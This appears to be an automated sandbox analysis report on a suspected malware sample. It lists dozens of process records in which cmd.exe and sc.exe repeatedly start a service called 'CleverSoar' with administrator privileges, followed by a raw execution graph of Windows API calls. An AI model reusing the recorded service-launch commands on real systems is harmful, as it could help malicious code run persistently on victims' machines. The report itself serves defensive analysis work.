                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:75
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:76
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:77
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:78
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:79
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:80
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:81
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:82
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:83
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:84
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:85
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:86
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:87
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:88
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:89
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:90
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:91
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:92
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:93
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:94
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:95
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:96
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:97
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:98
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:99
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:100
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:101
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:102
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:103
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:104
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:105
                                                          Start time:01:42:27
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:106
                                                          Start time:01:42:28
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:1.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:15.1%
                                                            Total number of Nodes:830
                                                            Total number of Limit Nodes:9
                                                            execution_graph 99978 6cc2cad3 99979 6cc2cae5 __dosmaperr 99978->99979 99980 6cc2cafd 99978->99980 99980->99979 99981 6cc2cb48 __dosmaperr 99980->99981 99983 6cc2cb77 99980->99983 100025 6cc20120 18 API calls __wsopen_s 99981->100025 99984 6cc2cb90 99983->99984 99985 6cc2cbab __dosmaperr 99983->99985 99988 6cc2cbe7 __wsopen_s 99983->99988 99984->99985 99987 6cc2cb95 99984->99987 100018 6cc20120 18 API calls __wsopen_s 99985->100018 100013 6cc319e5 99987->100013 100019 6cc247bb HeapFree GetLastError _free 99988->100019 99989 6cc2cd3e 99992 6cc2cdb4 99989->99992 99996 6cc2cd57 GetConsoleMode 99989->99996 99995 6cc2cdb8 ReadFile 99992->99995 99993 6cc2cc07 100020 6cc247bb HeapFree GetLastError _free 99993->100020 99998 6cc2cdd2 99995->99998 99999 6cc2ce2c GetLastError 99995->99999 99996->99992 100000 6cc2cd68 99996->100000 99997 6cc2cc0e 100011 6cc2cbc2 __dosmaperr __wsopen_s 99997->100011 100021 6cc2ac69 20 API calls __wsopen_s 99997->100021 99998->99999 100001 6cc2cda9 99998->100001 99999->100011 100000->99995 100002 6cc2cd6e ReadConsoleW 100000->100002 100006 6cc2cdf7 100001->100006 100007 6cc2ce0e 100001->100007 100001->100011 100002->100001 100005 6cc2cd8a GetLastError 100002->100005 100005->100011 100023 6cc2cefe 23 API calls 3 library calls 100006->100023 100009 6cc2ce25 100007->100009 100007->100011 100024 6cc2d1b6 21 API calls __wsopen_s 100009->100024 100022 6cc247bb HeapFree GetLastError _free 100011->100022 100012 6cc2ce2a 100012->100011 100015 6cc319ff 100013->100015 100016 6cc319f2 100013->100016 100014 6cc31a0b 100014->99989 100015->100014 100026 6cc20120 18 API calls __wsopen_s 100015->100026 100016->99989 100018->100011 100019->99993 100020->99997 100021->99987 100022->99979 100023->100011 100024->100012 100025->99979 100026->100016 100027 6caa3b72 100040 6cc16a43 100027->100040 100030 6cab639e 100106 6cc20130 18 API calls 2 library calls 100030->100106 100036 6caa37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100036->100030 100054 6cc0aec0 100036->100054 100058 6cab6ba0 100036->100058 100077 6cab6e60 100036->100077 100087 6cab7090 100036->100087 100100 6cade010 100036->100100 100042 6cc16a48 100040->100042 100041 6cc16a62 100041->100036 100042->100041 100045 6cc16a64 std::_Facet_Register 100042->100045 100107 6cc1f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100042->100107 100044 6cc178c3 std::_Facet_Register 100111 6cc19379 RaiseException 100044->100111 100045->100044 100108 6cc19379 RaiseException 100045->100108 100047 6cc180bc IsProcessorFeaturePresent 100053 6cc180e1 100047->100053 100049 6cc17883 100109 6cc19379 RaiseException 100049->100109 100051 6cc178a3 std::invalid_argument::invalid_argument 100110 6cc19379 RaiseException 100051->100110 100053->100036 100055 6cc0aed4 100054->100055 100056 6cc0aed6 FindFirstFileA 100054->100056 100055->100056 100057 6cc0af10 100056->100057 100057->100036 100059 6cab6bd5 100058->100059 100112 6cae2020 100059->100112 100061 6cab6c68 100062 6cc16a43 std::_Facet_Register 4 API calls 100061->100062 100063 6cab6ca0 100062->100063 100129 6cc17327 100063->100129 100065 6cab6cb4 100141 6cae1d90 100065->100141 100068 6cab6d8e 100068->100036 100070 6cab6dc8 100149 6cae26e0 24 API calls 4 library calls 100070->100149 100072 6cab6dda 100150 6cc19379 RaiseException 100072->100150 100074 6cab6def 100075 6cade010 67 API calls 100074->100075 100076 6cab6e0f 100075->100076 100076->100036 100078 6cab6e9f 100077->100078 100081 6cab6eb3 100078->100081 100540 6cae3560 32 API calls std::_Xinvalid_argument 100078->100540 100084 6cab6f5b 100081->100084 100542 6cae2250 30 API calls 100081->100542 100543 6cae26e0 24 API calls 4 library calls 100081->100543 100544 6cc19379 RaiseException 100081->100544 100083 6cab6f6e 100083->100036 100084->100083 100541 6cae37e0 32 API calls std::_Xinvalid_argument 100084->100541 100088 6cab709e 100087->100088 100092 6cab70d1 100087->100092 100545 6cae01f0 100088->100545 100090 6cab7183 100090->100036 100092->100090 100549 6cae2250 30 API calls 100092->100549 100093 6cc20b18 67 API calls 100093->100092 100095 6cab71ae 100550 6cae2340 24 API calls 100095->100550 100097 6cab71be 100551 6cc19379 RaiseException 100097->100551 100099 6cab71c9 100101 6cade04b 100100->100101 100102 6cae01f0 64 API calls 100101->100102 100103 6cade0a3 100101->100103 100104 6cade098 100102->100104 100103->100036 100105 6cc20b18 67 API calls 100104->100105 100105->100103 100107->100042 100108->100049 100109->100051 100110->100044 100111->100047 100113 6cc16a43 std::_Facet_Register 4 API calls 100112->100113 100114 6cae207e 100113->100114 100115 6cc17327 43 API calls 100114->100115 100116 6cae2092 100115->100116 100151 6cae2f60 42 API calls 4 library calls 100116->100151 100118 6cae210d 100121 6cae2120 100118->100121 100152 6cc16f8e 9 API calls 2 library calls 100118->100152 100119 6cae20c8 100119->100118 100120 6cae2136 100119->100120 100153 6cae2250 30 API calls 100120->100153 100121->100061 100124 6cae215b 100154 6cae2340 24 API calls 100124->100154 100126 6cae2171 100155 6cc19379 RaiseException 100126->100155 100128 6cae217c 100128->100061 100130 6cc17333 __EH_prolog3 100129->100130 100156 6cc16eb5 100130->100156 100134 6cc17351 100170 6cc173ba 39 API calls std::locale::_Setgloballocale 100134->100170 100136 6cc173ac 100136->100065 100138 6cc17359 100171 6cc171b1 HeapFree GetLastError _Yarn 100138->100171 100140 6cc1736f 100162 6cc16ee6 100140->100162 100142 6cae1ddc 100141->100142 100143 6cab6d5d 100141->100143 100176 6cc17447 100142->100176 100143->100068 100148 6cae2250 30 API calls 100143->100148 100147 6cae1e82 100148->100070 100149->100072 100150->100074 100151->100119 100152->100121 100153->100124 100154->100126 100155->100128 100157 6cc16ec4 100156->100157 100158 6cc16ecb 100156->100158 100172 6cc203cd 6 API calls std::_Lockit::_Lockit 100157->100172 100160 6cc16ec9 100158->100160 100173 6cc1858b EnterCriticalSection 100158->100173 100160->100140 100169 6cc17230 6 API calls 2 library calls 100160->100169 100163 6cc16ef0 100162->100163 100164 6cc203db 100162->100164 100165 6cc16f03 100163->100165 100174 6cc18599 LeaveCriticalSection 100163->100174 100175 6cc203b6 LeaveCriticalSection 100164->100175 100165->100136 100168 6cc203e2 100168->100136 100169->100134 100170->100138 100171->100140 100172->100160 100173->100160 100174->100165 100175->100168 100177 6cc17450 100176->100177 100178 6cae1dea 100177->100178 100185 6cc1fd4a 100177->100185 100178->100143 100184 6cc1c563 18 API calls __wsopen_s 100178->100184 100180 6cc1749c 100180->100178 100196 6cc1fa58 65 API calls 100180->100196 100182 6cc174b7 100182->100178 100197 6cc20b18 100182->100197 100184->100147 100187 6cc1fd55 __wsopen_s 100185->100187 100186 6cc1fd68 100222 6cc20120 18 API calls __wsopen_s 100186->100222 100187->100186 100188 6cc1fd88 100187->100188 100192 6cc1fd78 100188->100192 100208 6cc2ae0c 100188->100208 100192->100180 100196->100182 100198 6cc20b24 __wsopen_s 100197->100198 100199 6cc20b43 100198->100199 100200 6cc20b2e 100198->100200 100201 6cc20b3e 100199->100201 100403 6cc1c5a9 EnterCriticalSection 100199->100403 100418 6cc20120 18 API calls __wsopen_s 100200->100418 100201->100178 100203 6cc20b60 100404 6cc20b9c 100203->100404 100206 6cc20b6b 100419 6cc20b92 LeaveCriticalSection 100206->100419 100209 6cc2ae18 __wsopen_s 100208->100209 100224 6cc2039f EnterCriticalSection 100209->100224 100211 6cc2ae26 100225 6cc2aeb0 100211->100225 100216 6cc2af72 100217 6cc2b091 100216->100217 100249 6cc2b114 100217->100249 100220 6cc1fdcc 100223 6cc1fdf5 LeaveCriticalSection 100220->100223 100222->100192 100223->100192 100224->100211 100232 6cc2aed3 100225->100232 100226 6cc2ae33 100239 6cc2ae6c 100226->100239 100227 6cc2af2b 100244 6cc271e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100227->100244 100229 6cc2af34 100245 6cc247bb HeapFree GetLastError _free 100229->100245 100232->100226 100232->100227 100242 6cc1c5a9 EnterCriticalSection 100232->100242 100243 6cc1c5bd LeaveCriticalSection 100232->100243 100233 6cc2af3d 100233->100226 100246 6cc26c1f 6 API calls std::_Lockit::_Lockit 100233->100246 100236 6cc2af5c 100247 6cc1c5a9 EnterCriticalSection 100236->100247 100238 6cc2af6f 100238->100226 100248 6cc203b6 LeaveCriticalSection 100239->100248 100241 6cc1fda3 100241->100192 100241->100216 100242->100232 100243->100232 100244->100229 100245->100233 100246->100236 100247->100238 100248->100241 100251 6cc2b133 100249->100251 100250 6cc2b15b 100260 6cc2b27b 100250->100260 100266 6cc33ea8 37 API calls __wsopen_s 100250->100266 100251->100250 100252 6cc2b146 100251->100252 100265 6cc20120 18 API calls __wsopen_s 100252->100265 100254 6cc2b0a7 100254->100220 100262 6cc33fde 100254->100262 100257 6cc2b2cb 100257->100260 100267 6cc33ea8 37 API calls __wsopen_s 100257->100267 100259 6cc2b2e9 100259->100260 100268 6cc33ea8 37 API calls __wsopen_s 100259->100268 100260->100254 100269 6cc20120 18 API calls __wsopen_s 100260->100269 100270 6cc34396 100262->100270 100265->100254 100266->100257 100267->100259 100268->100260 100269->100254 100272 6cc343a2 __wsopen_s 100270->100272 100271 6cc343a9 100288 6cc20120 18 API calls __wsopen_s 100271->100288 100272->100271 100273 6cc343d4 100272->100273 100279 6cc33ffe 100273->100279 100278 6cc33ff9 100278->100220 100290 6cc206cb 100279->100290 100284 6cc34034 100286 6cc34066 100284->100286 100330 6cc247bb HeapFree GetLastError _free 100284->100330 100289 6cc3442b LeaveCriticalSection __wsopen_s 100286->100289 100288->100278 100289->100278 100331 6cc1bceb 100290->100331 100293 6cc206ef 100295 6cc1bdf6 100293->100295 100340 6cc1be4e 100295->100340 100297 6cc1be0e 100297->100284 100298 6cc3406c 100297->100298 100355 6cc344ec 100298->100355 100304 6cc34192 GetFileType 100307 6cc341e4 100304->100307 100308 6cc3419d GetLastError 100304->100308 100305 6cc3409e __dosmaperr 100305->100284 100306 6cc34167 GetLastError 100306->100305 100385 6cc317b0 SetStdHandle __dosmaperr __wsopen_s 100307->100385 100384 6cc1f9f2 __dosmaperr _free 100308->100384 100309 6cc34115 100309->100304 100309->100306 100383 6cc34457 CreateFileW 100309->100383 100311 6cc341ab CloseHandle 100311->100305 100326 6cc341d4 100311->100326 100314 6cc3415a 100314->100304 100314->100306 100315 6cc34205 100316 6cc34251 100315->100316 100386 6cc34666 70 API calls 2 library calls 100315->100386 100320 6cc34258 100316->100320 100400 6cc34710 70 API calls 2 library calls 100316->100400 100319 6cc34286 100319->100320 100321 6cc34294 100319->100321 100387 6cc2b925 100320->100387 100321->100305 100323 6cc34310 CloseHandle 100321->100323 100401 6cc34457 CreateFileW 100323->100401 100325 6cc3433b 100325->100326 100327 6cc34345 GetLastError 100325->100327 100326->100305 100328 6cc34351 __dosmaperr 100327->100328 100402 6cc3171f SetStdHandle __dosmaperr __wsopen_s 100328->100402 100330->100286 100332 6cc1bd0b 100331->100332 100333 6cc1bd02 100331->100333 100332->100333 100334 6cc249b2 __Getctype 37 API calls 100332->100334 100333->100293 100339 6cc269d5 5 API calls std::_Lockit::_Lockit 100333->100339 100335 6cc1bd2b 100334->100335 100336 6cc24f28 __Getctype 37 API calls 100335->100336 100337 6cc1bd41 100336->100337 100338 6cc24f55 __cftoe 37 API calls 100337->100338 100338->100333 100339->100293 100341 6cc1be76 100340->100341 100342 6cc1be5c 100340->100342 100344 6cc1be7d 100341->100344 100345 6cc1be9c 100341->100345 100343 6cc1bddc __wsopen_s HeapFree GetLastError 100342->100343 100354 6cc1be66 __dosmaperr 100343->100354 100347 6cc1bd9d __wsopen_s HeapFree GetLastError 100344->100347 100344->100354 100346 6cc24843 __fassign MultiByteToWideChar 100345->100346 100349 6cc1beab 100346->100349 100347->100354 100348 6cc1beb2 GetLastError 100348->100354 100349->100348 100350 6cc1bed8 100349->100350 100351 6cc1bd9d __wsopen_s HeapFree GetLastError 100349->100351 100352 6cc24843 __fassign MultiByteToWideChar 100350->100352 100350->100354 100351->100350 100353 6cc1beef 100352->100353 100353->100348 100353->100354 100354->100297 100357 6cc3450d 100355->100357 100359 6cc34527 100355->100359 100356 6cc3447c __wsopen_s 18 API calls 100361 6cc3455f 100356->100361 100358 6cc20120 __wsopen_s 18 API calls 100357->100358 100357->100359 100358->100359 100359->100356 100360 6cc3458e 100362 6cc35911 __wsopen_s 18 API calls 100360->100362 100366 6cc34089 100360->100366 100361->100360 100365 6cc20120 __wsopen_s 18 API calls 100361->100365 100363 6cc345dc 100362->100363 100364 6cc34659 100363->100364 100363->100366 100367 6cc2014d __Getctype 11 API calls 100364->100367 100365->100360 100366->100305 100369 6cc3160c 100366->100369 100368 6cc34665 100367->100368 100370 6cc31618 __wsopen_s 100369->100370 100371 6cc2039f std::_Lockit::_Lockit EnterCriticalSection 100370->100371 100378 6cc3161f 100371->100378 100372 6cc31666 100374 6cc31716 __wsopen_s LeaveCriticalSection 100372->100374 100373 6cc31644 100375 6cc31842 __wsopen_s 11 API calls 100373->100375 100376 6cc31686 100374->100376 100377 6cc31649 100375->100377 100376->100305 100382 6cc34457 CreateFileW 100376->100382 100377->100372 100381 6cc31990 __wsopen_s EnterCriticalSection 100377->100381 100378->100372 100378->100373 100379 6cc316b3 EnterCriticalSection 100378->100379 100379->100372 100380 6cc316c0 LeaveCriticalSection 100379->100380 100380->100378 100381->100372 100382->100309 100383->100314 100384->100311 100385->100315 100386->100316 100388 6cc315a2 __wsopen_s 18 API calls 100387->100388 100392 6cc2b935 100388->100392 100389 6cc2b93b 100390 6cc3171f __wsopen_s SetStdHandle 100389->100390 100399 6cc2b993 __dosmaperr 100390->100399 100391 6cc2b96d 100391->100389 100393 6cc315a2 __wsopen_s 18 API calls 100391->100393 100392->100389 100392->100391 100394 6cc315a2 __wsopen_s 